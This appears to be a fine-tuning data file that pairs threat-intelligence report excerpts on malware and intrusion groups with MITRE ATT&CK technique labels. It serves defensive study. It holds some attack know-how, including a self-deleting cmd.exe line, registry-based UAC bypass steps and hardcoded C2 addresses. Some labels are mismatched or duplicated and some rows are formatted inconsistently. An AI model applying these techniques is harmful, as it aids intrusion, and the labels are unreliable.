"The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication","['T1566.002 - Phishing: Spearphishing Link', 'T1105 - Ingress Tool Transfer', 'T1102.002 - Bidirectional Communication', 'T1204.001 - Malicious Link']",fine_tune
"At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels","['T1040 - Network Sniffing']",fine_tune
"As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please","['T1557 - Adversary-in-the-Middle']",fine_tune
"After execution, Ragnar Locker Ransomware encrypts the files and adds the extension “.ragnar” and an 8-digit number","['T1486 - Data Encrypted for Impact']",fine_tune
"When referring to additional plugins, it is worth noting that in early versions of Valak the plugins were downloaded by the second stage JS via PowerShell. More recent versions of Valak abandoned the popular yet easily detectable PowerShell downloader approach and transitioned to PluginHost as a means of managing and downloading additional payloads. This transition indicates that the Valak authors are looking for stealthier approaches and ways to improve their evasion techniques","['T1059.001 - Command and Scripting Interpreter: PowerShell']",fine_tune
"Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes a RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt","['T1560.001 - Archive Collected Data: Archive via Utility', 'T1119 - Automated Collection']",fine_tune
"We were able to source a sample that may be the malware involved in the May 2018 attacks. We ran it, and it broke the boot sector as expected (see Figure 1). An initial analysis of the file revealed it was created using Nullsoft Scriptable Install System (NSIS), an open-source application used to create setup programs. The actor behind this threat used the application and purposely named it “MBR Killer.” There are no indications of network-related behavior in this malware","['T1027 - Obfuscated Files or Information']",fine_tune
"In some attacks, Whitefly has used a second piece of custom malware, Trojan.Nibatad. Like Vcrodat, Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer. And similar to Vcrodat, the Nibatad payload is designed to facilitate information theft from an infected computer","['T1027 - Obfuscated Files or Information']",fine_tune
"Creates a new registry key HKCU\Software\Classes\Folder\shell\open\command - Sets the “Default” value to “path of the malware” - Creates a value “DelegateExecute” and sets the value to “0” - Executes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7","['T1112 - Modify Registry']",fine_tune
"These two files, keyword_parm.txt and parm.txt, contain instructions for MESSAGETAP to target and save contents of SMS messages","['T1560.003 - Archive via Custom Method']",fine_tune
"1) Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started. 2) Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2. 3) Initialize sessions, perform socks5 authorization with login/password (received from PROXY-C2 with command 10). 4) Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol","['T1090.002 - External Proxy']",fine_tune
"A technically relevant fact about this campaign is the use of Python embedded into Windows executables of the malware. There is no multi-platform support as the code is heavily Windows-oriented (use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component","['T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1059.006 - Command and Scripting Interpreter: Python']",fine_tune
"The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary","['T1105 - Ingress Tool Transfer']",fine_tune
"Guloader is a downloader that has been active since 2019. It is known to deliver various malware, more notably: Agent-Tesla, Netwire, FormBook, Nanocore, and Parallax RAT","['T1102 - Web Service']",fine_tune
738All of the backdoors identified – excluding RoyalDNS – required APT15 to create batch scripts in order to install its persistence mechanism. This was achieved through the use of a simple Windows run key['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
739Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations['T1095 - Non-Application Layer Protocol', 'T1105 - Ingress Tool Transfer']fine_tune
740This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the “MZ” and “PE” constants (Fig['T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
"One legitimate executable, sometimes signed, and vulnerable to dynamic-link library (DLL) sideloading - One malicious DLL loaded by the legitimate file - One binary file usually containing obfuscated code, unpacked in memory by the malicious DLL","['T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading']",fine_tune
"The `Download3rdStage` will first decode `https://discord.com` and try to connect to it. Then, it performs a time-based anti-debug check, as shown in the code below. If any of these checks fail, the DLL will not download the third stage","['T1497.003 - Time Based Evasion']",fine_tune
"DeepMalwareAnalysis . Joe Security's Blog . TrickBot's new API-Hammering explained . Published on: 13.07.2020 As usual, at Joe Security, we keep a close eye on evasive malware. It turned out to be a new TrickBot sample using API hammering to bypass analysis. Two Stage API Hammering . Right after the entry point, the sample tries to load taskmgr.exe as a DLL: This is likely a trick to bypass emulators that do not check if a given DLL exists if LoadLibraryEx is called. Since FreeConsole has been called before the loop, all printf calls do basically nothing: This code has been directly copied from the documentation of printf: So what is the purpose of those numerous printf loops? As a result, the massive amount of calls delays the execution process and overloads the sandbox with junk data. This behavior is called API Hammering. API Hammering is not a new technique, we have already seen it several years ago e.g. Joe Sandbox detects the API hammering successfully and rates it as malicious: Right after the printf flood, the sample performs another loop to delay execution by creating and writing to a temporary file - the second stage. In between it performs random sleeps: Again, the purpose is to overload the sandbox and delay the execution. No matter what technology your favorite sandbox uses, it has to handle API Hammering correctly","['T1106 - Native API']",fine_tune
"When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value. This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system. The data structure used to transmit the agent_id to the C2 is as follows","['T1106 - Native API']",fine_tune
"Inception’s malware is modular and the attackers will load plugins based on requirements for each attack. The group has used a range of plugins in recent attacks, some of which are improved versions of plugins used in 2014, while others were previously unseen","['T1057 - Process Discovery']",fine_tune
"When running under a limited UAC account, the installer extracts d3d9.dll and creates a persistence key under HKCU\Software\Microsoft\Windows\Run","['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']",fine_tune
"The process begins with the consistent execution of a malicious DLL using the legitimate regsvr32.exe Windows utility. Once executed, the DLL is deleted from the system and its components are dropped to the system","['T1218.010 - Signed Binary Proxy Execution: Regsvr32']",fine_tune
"Following the initial compromise, in many instances the BackdoorDiplomacy group employed open-source reconnaissance and red-team tools to evaluate the environment for additional targets of opportunity and lateral movement. Among the tools documented are","['T1105 - Ingress Tool Transfer', 'T1588.002 - Tool']",fine_tune
"Once the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared Google Document. If it is not able to connect to the address, it uses a hardcoded one","['T1565.002 - Transmitted Data Manipulation']",fine_tune
"Hildegard uses LD_PRELOAD to hide the malicious process launched inside the containers. The malware modified the /etc/ld.so.preload file to intercept shared libraries’ imported functions","['T1574.006 - Hijack Execution Flow: LD_PRELOAD']",fine_tune
"The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy. Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim’s O365 tenant and began performing enumeration queries","['T1087.002 - Account Discovery: Domain Account', 'T1482 - Domain Trust Discovery']",fine_tune
"Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. It then redirects the user to install a “Font Manager” extension from the Chrome Web Store, as seen in Figure 2. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted, however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of the extension has a legitimate jQuery.js included in the extension bundle. Figure 4: Given the threat actor’s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site. They spent significant time and resources doing reconnaissance on their targets, as evidenced by the comments left on the Chrome extension page","['T1176 - Browser Extensions']",fine_tune
"After the payload execution it reaches out to the C2 via POST request as shown below","['T1071.001 - Application Layer Protocol: Web Protocols']",fine_tune
"All RDAT samples have malicious verdicts in WildFire and have protections in place through Cortex XDR. DNS tunneling protocols used for C2 communications are blocked via DNS Security. All C2 domains are classified as Command-and-Control for URL Filtering. AutoFocus customers can monitor activity via the rdat_backdoor tag","['T1132.002 - Non-Standard Encoding', 'T1132.001 - Data Encoding: Standard Encoding']",fine_tune
"The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. In addition, the blog also mentioned that a host of other large corporations were also targets of this same attack. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. Download a remote file, save it as %Temp%\mdm.exe, and then execute it. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. The attacker can exploit this issue by supplying a malicious Flash ('.swf') file or by embedding a malicious Flash application in a PDF file","['T1105 - Ingress Tool Transfer']",fine_tune
"We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6] describes the syntax and values that can be used as an example. An interesting file to look at is the ‘settings.xml’ file that can be discovered in the ‘Word’ container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values","['T1221 - Template Injection']",fine_tune
"FireEye has dubbed the cybercrime gang FIN5. One of the most unique things about FIN5 is that in every intrusion we responded to where FIN5 has been active, legitimate access was identified. ""They had valid user credentials to remotely log into the network,"" said Barry Vengerik, principal threat analyst at FireEye. No sexy zero-days, no remote exploits -- not even spearphishing","['T1110 - Brute Force']",fine_tune
"It looks like GrowlHelper creates an executable named Software Update Check when it thinks it’s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name","['T1036.004 - Masquerading: Masquerade Task or Service']",fine_tune
"FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection","['T1555 - Credentials from Password Stores', 'T1003.001 - OS Credential Dumping: LSASS Memory', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1552.006 - Unsecured Credentials: Group Policy Preferences', 'T1003.004 - OS Credential Dumping: LSA Secrets', 'T1588.002 - Tool']",fine_tune
"PowerPunch also provides an excellent example of this. The key is applied to an executable payload downloaded directly from adversary infrastructure, allowing for an encryption key unique to the target host (highlighted variable names were changed for clarity","['T1105 - Ingress Tool Transfer']",fine_tune
"The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. This technique has been documented in the MITRE ATT&CK knowledge base as CMSTP; an example of how this technique is used may be found here. This technique has been used in the past by Cobalt, another financially motivated group. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe","['T1059.007 - Command and Scripting Interpreter: JavaScript']",fine_tune
"cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\Windows\GDI.bin. It then moves itself to %APPDATA%\Windows\WindowsImplantment.exe and sets both of these files to have the hidden and system flags to hide them from the user. With the Trojan moved to its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify an erroneous transmission from the C2, which gave OopsIE its name, is reversed to spoo. hex(STDOUT of whoami command)> If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2","['T1105 - Ingress Tool Transfer']",fine_tune
"In October 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Therefore, the Cobalt group registered domains that are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Additional means of circumventing anti-virus tools include the use of exploits to increase the level of rights and privileges, bypassing UAC, and injecting code into trusted processes. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and searches for critical servers and the computers from which they are accessed","['T1068 - Exploitation for Privilege Escalation']",fine_tune
"The dropped payload is a DLL file that has been packed using the UPX packer. The unpacked sample is highly obfuscated and important API calls and strings have been encrypted using a custom encryption algorithm. Whenever in the code the malware needs to use a string, it takes the encrypted string and passes it into two functions to decrypt it","['T1027.002 - Obfuscated Files or Information: Software Packing']",fine_tune
"This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim’s system regardless of whether macros are enabled","['T1559.002 - Inter-Process Communication: Dynamic Data Exchange']",fine_tune
"POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. POWERTON typically gets deployed as a later stage backdoor and is obfuscated with several layers","['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']",fine_tune
"A batch file that is used to run Bitsadmin and Rundll to download and execute the Egregor payload. A Zip file contains a binary file that is an RClone client, renamed svchost, and RClone config files (webdav, ftp and dropbox) used later for exfiltration","['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']",fine_tune
"The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities","['T1049 - System Network Connections Discovery', 'T1518 - Software Discovery', 'T1027 - Obfuscated Files or Information']",fine_tune
"The archive contains two files; the first is an executable file, while the second is a decoy PDF document. The bear’s lair . The Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy downloaders. How the bear hunts . In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor. As we did not identify a pattern in the order in which the commands are invoked, we believe the operators are executing them manually. The first set of commands gathers information about the victim’s computer and environment: The commands above are commonly executed when the operators first connect to a newly activated backdoor. Moreover, the backdoor contains a list of filenames related to credentials from software listed below (database names): The operators take care of retrieving these databases if they are present on the victim’s computer. The operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer. This backdoor is executed using the CMD_EXECUTE command: There are some interesting facts here. The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated","['T1083 - File and Directory Discovery']",fine_tune
"The reason for this is that most of the file comprises meaningless overlay data, since the file is an automatically generated AutoIT executable with an AutoIT3 script embedded inside. Once started, it downloads additional malware from the C2 and also uploads some basic system information, stealing, among other things, the user’s Google Chrome credentials. The backdoor also pings the C2 server at regular intervals. A good security analyst can spot this while analyzing firewall log files and thereby find out that something suspicious might be going on in the network","['T1105 - Ingress Tool Transfer']",fine_tune
"Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the ‘at’ or ‘schtask’ commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems","['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']",fine_tune
"This structure parses out executable scripts from data provided via a remote operator. In this case, the REGEX value indicates this implant will receive scripts compressed (tar files). The malware will then decompress them before executing the embedded script. Analysis indicates the WellMail implant is similar in design and structure to the WellMess implant -- and both accept and execute shell scripts from a remote operator","['T1105 - Ingress Tool Transfer']",fine_tune
"Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014","['T1204.002 - User Execution: Malicious File']",fine_tune
"We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack","['T1204.001 - Malicious Link', 'T1566.002 - Phishing: Spearphishing Link', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link', 'T1120 - Peripheral Device Discovery']",fine_tune
"Finally, the malware changes the password of the local users. In the files analyzed, all the passwords chosen by the actor have the same pattern: Aa153","['T1531 - Account Access Removal']",fine_tune
"The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2","['T1041 - Exfiltration Over C2 Channel', 'T1573.001 - Symmetric Cryptography']",fine_tune
"In response to historical disclosures detailing TA416 PlugX malware infection and encoding methods, the group appears to have adopted a rapid rate of development for their PlugX payloads. The group uses different legitimate PE files to initiate sideloading, as well as a variety of PlugX DLL loaders including the PotPlayer and DocCon versions noted in this publication. TA416 also uses different variants of the final PlugX payload in which the communication routines are observed to be different when closely analyzed. Additionally, the payload DAT file decryption method has evolved regularly since the beginning of 2022. Several observed decryption schemas and a sample configuration are included below with date ranges detailing the evolution of observed PlugX payloads","['T1027 - Obfuscated Files or Information']",fine_tune
"Usually, after infection the bot sends a ‘PING’ message, ‘SYSTEM INFO’ message and ‘ASK for COMMAND’ message, and the C2 replies with ‘ACK’ and ‘COMMAND’ messages. If additional modules were pushed by the C2, the bot sends a ‘STOLEN INFO’ message containing data stolen by the modules","['T1041 - Exfiltration Over C2 Channel']",fine_tune
"The malware can use 2 different public RSA keys: one exported using the crypto API in a public blob, or one embedded in base64 in the malware. The malware will only use the second one if it cannot create the crypto context or has some problem with the crypto API functions","['T1106 - Native API']",fine_tune
"Pillowmint is usually installed through a malicious shim database which allows the malware to persist in the system","['T1546.011 - Event Triggered Execution: Application Shimming']",fine_tune
"1) An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence. 2) User downloads the application and follows attached instructions on how to install it. 3) LoudMiner is installed first, the actual VST software after. 4) LoudMiner hides itself and becomes persistent on reboot. 5) The Linux virtual machine is launched and the mining starts. 6) Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries","['T1569.002 - System Services: Service Execution', 'T1218.007 - Signed Binary Proxy Execution: Msiexec']",fine_tune
"Once on the network, the attackers engaged in network reconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following commands","['T1482 - Domain Trust Discovery']",fine_tune
"When REvil was first discovered, it was delivered to targets via exploitation of Oracle WebLogic vulnerabilities. There are reports that the threat actors leveraged a strategic web compromise (SWC) to deliver REvil by compromising the Italian WinRAR . it website and replacing the WinRAR installation executable with an instance of the malware. The SWC resulted in the infection of unsuspecting WinRAR customers' systems. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers. The diversity and complexity of delivery mechanisms employed by the REvil threat actors in a short period of time suggest a high level of sophistication","['T1189 - Drive-by Compromise']",fine_tune
"ZxShell.dll is injected into a shared SVCHOST process. The Svchost group registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost is opened and the netsvc group value data is queried to generate a name for the service","['T1055.001 - Process Injection: Dynamic-link Library Injection']",fine_tune
"MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks","['T1614.001 - System Location Discovery: System Language Discovery', 'T1082 - System Information Discovery']",fine_tune
"DriveSlayer is digitally signed using a valid certificate and also abuses a legitimate EaseUS Partition Master driver to gain raw disk access and manipulate the disk to make the system inoperable","['T1553.002 - Code Signing']",fine_tune
"Like any other typical PoS malware, Pillowmint iterates a list of processes and processes them two at a time. It uses the API OpenProcess() using the PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle, then reads the memory’s content via the ReadProcessMemory() API two chunks at a time. Depending on the Pillowmint version, it may encrypt the stolen CC data with the AES encryption algorithm + Base64. This is then written to a file named ""ldb_e.log"" in the Windows System directory","['T1106 - Native API']",fine_tune
"Along with the EDRPOU numbers, the backdoor collects proxy and email settings, including usernames and passwords, from the M.E.Doc application","['T1087.003 - Email Account']",fine_tune
"Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations","['T1588.002 - Tool']",fine_tune
"Once the Bazar loader downloads its payload, the Bazar backdoor, it is decrypted using the same method as the aforementioned Team9 variant","['T1104 - Multi-Stage Channels']",fine_tune
"For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying","['T1589.001 - Credentials']",fine_tune
"Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. At the time of writing, tmate sessions are the only way the attacker interacts with the compromised containers","['T1219 - Remote Access Software', 'T1219 - Remote Access Software']",fine_tune
"After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data","['T1016 - System Network Configuration Discovery', 'T1497.003 - Time Based Evasion', 'T1124 - System Time Discovery']",fine_tune
"Once the VBScript in XSL has been run, console commands launched by the JS code continue to be executed. Three files are copied into the folder OFFICE12 that was created in the user profile. Those files are","['T1220 - XSL Script Processing']",fine_tune
"POSHSPY makes the most of using built-in Windows features – so-called “living off the land” – to make an especially stealthy backdoor. POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory. The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert","['T1059.001 - Command and Scripting Interpreter: PowerShell']",fine_tune
"The attack typically begins with an attempt – most probably via a spearphishing email – to lure the intended victim into running the malicious dropper, which is attached to the email. In order to increase the likelihood that the unsuspecting victim will actually click on it, the malicious executable masquerades as a document or spreadsheet by displaying a fake icon","['T1566.001 - Phishing: Spearphishing Attachment', 'T1204.002 - User Execution: Malicious File']",fine_tune
"From the main function, the malware invokes a function named eiht_get_update. This function attempts to read a remote file (ret.txt) from andrewka6.pythonanywhere.com that contained the address of the remote command and control server. If that failed, the malware would default to using the hard-coded (albeit encrypted) IP address 167.71.237.219. In order to gather information about the infected host, it invokes a function named: ei_get_host_info …which in turn invokes various macOS APIs such as getlogin and gethostname","['T1620 - Reflective Code Loading']",fine_tune
"It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language","['T1082 - System Information Discovery']",fine_tune
"On February 12, 2018 at 16:45 (all times are in the organization’s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp://mynetwork.ddns[DOT].net:880","['T1566.002 - Phishing: Spearphishing Link']",fine_tune
"Figure 3 outlines the architecture of Crutch version 3. It includes a backdoor that communicates with a hardcoded Dropbox account using the official HTTP API. In some variants, we noticed the presence of recovery C&C channels using either GitHub or a regular domain","['T1071.001 - Application Layer Protocol: Web Protocols']",fine_tune
"Loader Trojan The payload dropped to the system by the macro is an executable that is responsible for installing and executing a dynamic link library (DLL) to the system. The loader has several coding features that make it interesting. Upon execution, the loader will decrypt the embedded payload (DLL) using a custom algorithm followed by decompressing it using the RtlDecompressBuffer API. This API is normally used for Windows drivers, but there is nothing to prevent a userland process from using it, and the parameters are documented on MSDN. The compression algorithm used is LZNT1 with maximum compression level. The payload is decrypted using a starting 10-byte XOR key of: 0x3950BE2CD37B2C7CCBF8. The payload is in the loader at file offset: 0x19880 - 0x1F23C size of 0x59BD. The payload can be decrypted and decompressed with the following Python script","['T1027 - Obfuscated Files or Information']",fine_tune
"After analyzing the final payload, we determined the winner was… a Remote Administration Tool, which we have named ROKRAT. The address used in the email was 'kgf2016@yonsei.ac.kr' which is the contact email of the Korea Global Forum where the slogan in 2016 was ""Peace and Unification of the Korean Peninsula"". This fact gives more credit and legitimacy to the email. This file is decoded and finally an executable is launched: ROKRAT. This RAT has the added complexity that the command and control servers are legitimate websites. The malware uses Twitter and two cloud platforms, Yandex and Mediafire, apparently for both C2 communications and exfiltration platforms. Unfortunately, these platforms are difficult to block globally within organizations as their use can be viewed as legitimate in most cases. Additionally, these 3 platforms all make use of HTTPS connectivity, making it much more difficult to identify specific patterns or the usage of specific tokens","['T1102.002 - Bidirectional Communication']",fine_tune
803Skip to main content . We use optional cookies to improve your experience on our websites, such as through social media connections, and to display personalized advertising based on your online activity. If you reject optional cookies, only cookies necessary to provide you the services will be used. Using reg to configure the registry of remote computers limits the parameters that you can use in some operations. Check the syntax and parameters for each operation to verify that they can be used on remote computers . In this article['T1112 - Modify Registry', 'T1012 - Query Registry']fine_tune
804Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. DGet — This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity['T1140 - Deobfuscate/Decode Files or Information']fine_tune
805All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http://camilleoconnell[.]website The network communication is performed over HTTP. The malware uses a hardcoded User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) To register a new infected system the malware performs a POST request to /api/white_walkers/new with data on the compromised system consisting of['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
806The SodomMain module is LookBack malware’s remote access Trojan module that can send and receive numerous commands indicative of its function as a RAT. The malware is delivered within the encoded data that is received by the SodomNormal module as part of its initial beacon response. It then runs within the SodomNormal module and uses its “send_data” function for C&C communications['T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
